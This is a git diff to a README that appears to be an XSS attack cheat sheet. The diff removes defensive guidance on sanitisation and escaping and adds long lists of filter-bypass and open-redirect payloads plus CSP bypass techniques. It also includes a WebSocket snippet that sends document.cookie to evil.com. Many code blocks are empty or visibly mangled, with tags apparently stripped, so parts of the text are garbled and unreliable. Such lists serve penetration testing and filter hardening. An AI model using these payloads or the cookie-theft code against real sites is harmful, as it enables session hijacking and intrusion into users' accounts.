diff --git a/README.md b/README.md index d0e3ec5..ee3233a 100644 --- a/README.md +++ b/README.md @@ -52,16 +52,7 @@ Template Literals: If input is in a template literal: `${alert(1)}` 4.1 Content Security Policy (CSP) Bypass CSP is a security measure that helps prevent XSS by specifying trusted content sources. However, it can be bypassed if not correctly configured. -4.1.1 Methods to Bypass CSP -Using JSONP: Exploit JSONP endpoints that execute arbitrary JavaScript. -Misconfigured CSP Headers: Overly permissive or misconfigured CSP headers, such as those allowing unsafe-inline or unsafe-eval. -Inline Script Allowances: Inject inline scripts if the CSP allows it. -4.1.2 Example CSP Bypass -``` - -``` + 4.2 Polyglot XSS Polyglot payloads can function in multiple contexts (HTML, JS, CSS) to bypass input filters. @@ -104,10 +95,38 @@ Using null bytes to bypass filters or terminate strings early. 4.7.1 Example Null Byte Injection ``` + + + + +Click me +
+ ``` 4.8 Case Variation Altering the case of HTML tags and attributes to bypass case-sensitive filters. +Obfuscation Techniques +``` +// Obfuscation with white spaces +alert(1) + +// Breaking up keywords +alert(1) + +// Using concatenation +alert(1) +``` + +Unexpected Input Variations +``` +// Inline event handlers +click + +// Injecting into attributes + +``` + 4.8.1 Example Case Variation ``` @@ -146,20 +165,298 @@ Browser Developer Tools: Use the console, breakpoints, and step through the Java 7.1 Input Validation and Sanitization Ensure all user inputs are validated and sanitized before being processed or rendered. -7.1.1 Example Sanitization -Use libraries like DOMPurify to clean HTML inputs. +Bypassing Filters with HTML Entities +``` + + +``` -7.2 Content Security Policy (CSP) -Properly configure CSP headers to mitigate XSS. +Bypassing Filters with Null Bytes +Null byte injection can terminate strings early or bypass certain filters by injecting null characters. -7.2.1 Example CSP Header +``` + +``` -Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random-nonce' -7.3 Escaping Outputs -Always escape data before rendering it in HTML, JavaScript, or other client-side contexts. +# Open Redirect Exploits -Example Escaping -Use functions like htmlspecialchars in PHP or escape in Python. +Basic Open Redirect to XSS + +// Basic payload, JavaScript code is executed after "javascript:" +javascript:alert(1) + +Bypassing "javascript" Word Filter with CRLF +``` +java%0d%0ascript%0d%0a:alert(0) +``` +Abusing Bad Subdomain Filter +``` +javascript://sub.domain.com/%0Aalert(1) +``` + +JavaScript with "://" +``` +javascript://%250Aalert(1) +``` + +``` +// Variation with query +javascript://%250Aalert(1)//?1 +javascript://%250A1?alert(1):0 +``` +Other Variations +``` +%09Jav%09ascript:alert(document.domain) +javascript://%250Alert(document.location=document.cookie) +/%09/javascript:alert(1); +/%09/javascript:alert(1) +//%5cjavascript:alert(1); +//%5cjavascript:alert(1) +/%5cjavascript:alert(1); +/%5cjavascript:alert(1) +javascript://%0aalert(1) +<>javascript:alert(1); +//javascript:alert(1); +//javascript:alert(1) +/javascript:alert(1); +/javascript:alert(1) +\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) +javascript:alert(1); +javascript:alert(1) +javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) +javascript:confirm(1) +javascript://https://whitelisted.com/?z=%0Aalert(1) +javascript:prompt(1) +jaVAscript://whitelisted.com//%0d%0aalert(1);// +javascript://whitelisted.com?%a0alert%281%29 +/x:1/:///%01javascript:alert(document.cookie)/ +";alert(0);// +``` +Open Redirect by Uploading SVG Files +Using SVG files to perform open redirects can be effective, especially when the application allows file uploads. +``` + + + +``` + +Client-Side Prototype Pollution to XSS +Prototype pollution in JavaScript occurs when an attacker can modify the properties of Object.prototype. This can lead to XSS if these properties are used in sensitive operations. + +// Prototype pollution payload +Object.prototype.polluted = 'polluted'; +If the application uses a polluted object property in a dangerous way, this can lead to XSS: + +``` +var obj = {}; +alert(obj.polluted); // Outputs: polluted +``` + +# How to Bypass Internal Filtering for XSS +Bypassing internal filtering mechanisms such as Web Application Firewalls (WAFs) and input sanitization requires a deep understanding of how these filters operate and the techniques that can be used to circumvent them. This guide provides an in-depth look at various methods to bypass internal filtering mechanisms for XSS attacks. + +Internal filters and WAFs are designed to prevent malicious inputs by inspecting, sanitizing, or blocking suspicious content. Common filtering techniques include: + +Blacklisting: Blocking known malicious patterns or keywords. +Whitelisting: Allowing only specific safe inputs. +Encoding: Converting special characters to their HTML entities. +Normalization: Simplifying input to a consistent form for easier inspection. + +Techniques for Bypassing Filters +2.1 Encoding and Decoding +Using various encoding methods can help bypass filters that don't decode inputs before inspection. + +URL Encoding +``` +%3Cscript%3Ealert(1)%3C/script%3E +``` +Double URL Encoding +``` +%253Cscript%253Ealert(1)%253C/script%253E +``` +HTML Entities +``` +<script>alert(1)</script> +``` +Unicode Encoding +``` +\u003Cscript\u003Ealert(1)\u003C/script\u003E +``` +Case Variation +Altering the case of HTML tags and attributes can bypass filters that are case-sensitive. +``` + + +``` +Comment Insertion +Inserting comments within the payload can break up patterns that the filter is looking for. +``` +ipt>alert(1)ipt> +``` +Using Null Bytes +Null byte injection can terminate strings early or bypass certain filters. +``` + + +``` +Breaking Up Keywords +``` +alert(1) +``` +Using Concatenation +``` +alert(1) +``` +Leveraging Browser Parsing Quirks +Different browsers may interpret malformed HTML or JavaScript in ways that can be exploited. +``` +ipt>alert(1)ipt> +``` +Incomplete Tags +``` +click +``` +Inserting White Spaces and Line Breaks +Using white spaces and line breaks to bypass filters. + +``` +alert(1) + +``` +Combining Techniques +Combining multiple bypass techniques to create a payload that evades detection. + +``` +alert(1) +%3Cscript%3E%61lert(1)%3C/script%3E +alert(1)%00 +``` +3. Real-World Examples +3.1 URL Encoding and Decoding +Using URL encoding to bypass filters that do not decode inputs before inspection. + + +Combining case variation and comment insertion to bypass case-sensitive filters. + +``` + +ipt>alert(1)ipt> +``` +Null Byte Injection +Using null bytes to terminate strings early or bypass certain filters. + +``` + + +``` +Obfuscation and Concatenation +Using obfuscation and concatenation to avoid detection by filters. + +``` +alert(1) +alert(1) +``` + + +# Understanding CSP +CSP works by allowing website owners to define a whitelist of trusted sources for content such as scripts, styles, images, and more. This is done through the Content-Security-Policy HTTP header. Key directives include: + +default-src: The default policy for loading content types. +script-src: Defines trusted sources for JavaScript. +style-src: Defines trusted sources for CSS. +img-src: Defines trusted sources for images. +2. Common CSP Misconfigurations +Misconfigured CSP policies are often the root cause of bypasses. Common issues include: + +Allowing unsafe-inline or unsafe-eval in script-src. +Overly permissive whitelists. +Failing to cover all possible directives, leaving certain content types unprotected. + +# Bypassing CSP + +JSONP (JSON with Padding) allows data to be fetched from a different domain using a +``` + +# Exploiting Script Gadgets +Script gadgets are existing pieces of code on a website that can be exploited to perform unintended actions. This is particularly effective if unsafe-inline or unsafe-eval is used. + +Exploitation +Find an existing inline script that can be manipulated. +Inject code that modifies the behavior of the script. + +Content Injection via Whitelisted CDNs +If a Content Delivery Network (CDN) is whitelisted, and the attacker can upload content to that CDN, they can inject malicious scripts. + +Exploitation +Upload a malicious script to cdn.example.com. +Include the script on the target site: +``` + +``` + +Subresource Integrity (SRI) Bypass +SRI is used to ensure that resources hosted on third-party servers have not been tampered with. However, if SRI is not used properly, it can be bypassed. + +Exploitation +Host a script on a trusted domain without SRI. +Include the script: +``` + +``` +Mutation XSS +Mutation XSS exploits the way browsers handle dynamic content changes. If CSP allows unsafe-inline, attackers can inject payloads that mutate the DOM in unexpected ways. + +Exploitation: +``` +
+ +``` + +Using WebSockets +WebSockets can sometimes be used to exfiltrate data or execute JavaScript if allowed by CSP. + +Exploitation: +``` +var ws = new WebSocket("wss://evil.com/socket"); +ws.onopen = function() { + ws.send(document.cookie); +}; +``` + +CSP Nonce Reuse +If the CSP nonce is reused or predictable, it can be exploited to run malicious scripts. + +Exploitation +Predict or capture the nonce value. +Use the nonce to execute a script: + +``` + +``` + +Example of a Secure CSP Header +Here’s an example of a secure CSP header that mitigates most XSS attacks: +``` +Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random-nonce'; style-src 'self' 'nonce-random-nonce'; object-src 'none'; frame-ancestors 'none'; base-uri 'self'; form-action 'self'; +``` Use Security Libraries Utilize libraries like DOMPurify to clean HTML inputs and prevent XSS.